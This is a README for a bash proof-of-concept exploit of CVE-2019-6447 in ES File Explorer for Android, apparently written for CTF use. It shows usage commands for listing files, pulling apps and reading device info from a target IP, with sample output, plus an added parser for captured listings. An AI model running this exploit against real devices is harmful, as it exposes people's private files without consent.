Description
A very basic bash script to exploit CVE-2019-6447.
Introduction
# PoC ES File Explorer 4.1.9.7.4 (CVE-2019-6447)
<div align="center"><img height="150px" width="150px" src="https://img.icons8.com/ios/500/es-file-explorer.png"></img></div>
<p align="justify">This is a very simple bash implementation of the <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6447">CVE-2019-6447</a> PoC. It uses curl to send the requests with the right parameters. I built it because I was looking for a similar script during a CTF and couldn't find one. You can play around with the original script and customize it however you like.</p>
### Installation:
Simply clone the repository and use the .sh file.
```sh
git clone git@github.com:julio-cfa/POC-ES-File-Explorer-CVE-2019-6447.git
```
Or copy and paste the raw content to a file.
### Usage:
```console
kyoto :: ~ % ./ESExplorerExploit.sh -h
--- This is a very simple PoC of the ES File Explorer CVE-2019-6447 ---
You can try the following commands:
listFiles         List all files
listPics          List all pictures
listVideos        List all videos
listAudios        List all audios
listApps          List all applications installed
listAppsSystem    List system apps
listAppsPhone     List communication related applications
listAppsSdcard    List the apps installed on the sd card
listAppsAll       List all applications
getAppThumbnail   List icons for the specified application
appLaunch         Start the developed application
appPull           Download an application from your device
getDeviceInfo     Get system information
Usage example: ./ESExplorerExploit.sh 10.10.10.247 sdcard listFiles
```
### Example:
```console
kyoto :: ~ % ./ESExplorerExploit.sh 10.10.10.247 sdcard/DCIM listFiles
[
{"name":"example1.jpg", "time":"4/21/21 02:38:08 AM", "type":"file", "size":"135.33 KB (138,573 Bytes)", },
{"name":"example2.png", "time":"4/21/21 02:37:50 AM", "type":"file", "size":"6.24 KB (6,392 Bytes)", },
{"name":"example3.jpg", "time":"4/21/21 02:38:18 AM", "type":"file", "size":"1.14 MB (1,200,401 Bytes)", },
{"name":"example4.png", "time":"4/21/21 02:37:21 AM", "type":"file", "size":"124.88 KB (127,876 Bytes)", }
]
```
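The listing above is not strict JSON: every object ends with a trailing comma, so a standard parser rejects it. The Python below is an added example, not part of the original repository; it repairs and parses a captured listing in that shape (for instance one recovered from a packet capture during triage) and summarises what was disclosed. The function names are hypothetical and the sample data is constructed from the output shown above.

```python
import json
import re

# Constructed sample in the same shape as the listing shown above.
SAMPLE = '''[
{"name":"example1.jpg", "time":"4/21/21 02:38:08 AM", "type":"file", "size":"135.33 KB (138,573 Bytes)", },
{"name":"example2.png", "time":"4/21/21 02:37:50 AM", "type":"file", "size":"6.24 KB (6,392 Bytes)", },
{"name":"example3.jpg", "time":"4/21/21 02:38:18 AM", "type":"file", "size":"1.14 MB (1,200,401 Bytes)", },
{"name":"example4.png", "time":"4/21/21 02:37:21 AM", "type":"file", "size":"124.88 KB (127,876 Bytes)", }
]'''

# Match whole JSON strings first so commas inside file names are never touched,
# then any comma that is followed only by whitespace and a closing } or ].
_STRING_OR_TRAILING_COMMA = re.compile(r'"(?:\\.|[^"\\])*"|,(?=\s*[}\]])')
_BYTES = re.compile(r'\(([\d,]+) Bytes\)')


def strip_trailing_commas(text):
    """Drop commas that directly precede } or ], leaving string contents alone."""
    return _STRING_OR_TRAILING_COMMA.sub(
        lambda m: m.group(0) if m.group(0).startswith('"') else '', text)


def parse_listing(text):
    """Return the listing as dicts, each with an added integer 'bytes' field."""
    entries = json.loads(strip_trailing_commas(text))
    for entry in entries:
        m = _BYTES.search(entry.get("size", ""))
        entry["bytes"] = int(m.group(1).replace(",", "")) if m else None
    return entries


def summarize(entries):
    """Map file extension -> (entry count, total bytes) for an exposure summary."""
    summary = {}
    for entry in entries:
        name = entry.get("name", "")
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        count, total = summary.get(ext, (0, 0))
        summary[ext] = (count + 1, total + (entry["bytes"] or 0))
    return summary


if __name__ == "__main__":
    for ext, (count, total) in sorted(summarize(parse_listing(SAMPLE)).items()):
        print(f"{ext or '(none)'}: {count} file(s), {total} bytes")
```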
### References:
If you're curious about how this exploit works behind the scenes, or if it fails and you have to build your own script, see the following links:
https://packetstormsecurity.com/files/163303/ES-File-Explorer-4.1.9.7.4-Arbitrary-File-Read.html \
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln \
https://www.safe.security/assets/img/research-paper/pdf/es-file-explorer-vulnerability.pdf \
https://medium.com/@knownsec404team/analysis-of-es-file-explorer-security-vulnerability-cve-2019-6447-7f34407ed566
File snapshot
[4.0K] /data/pocs/42b431abd393a7a5da5bfc3e791bf68c79f5934e
├── [1.3K] ESExplorerExploit.sh
└── [2.7K] README.md
0 directories, 2 files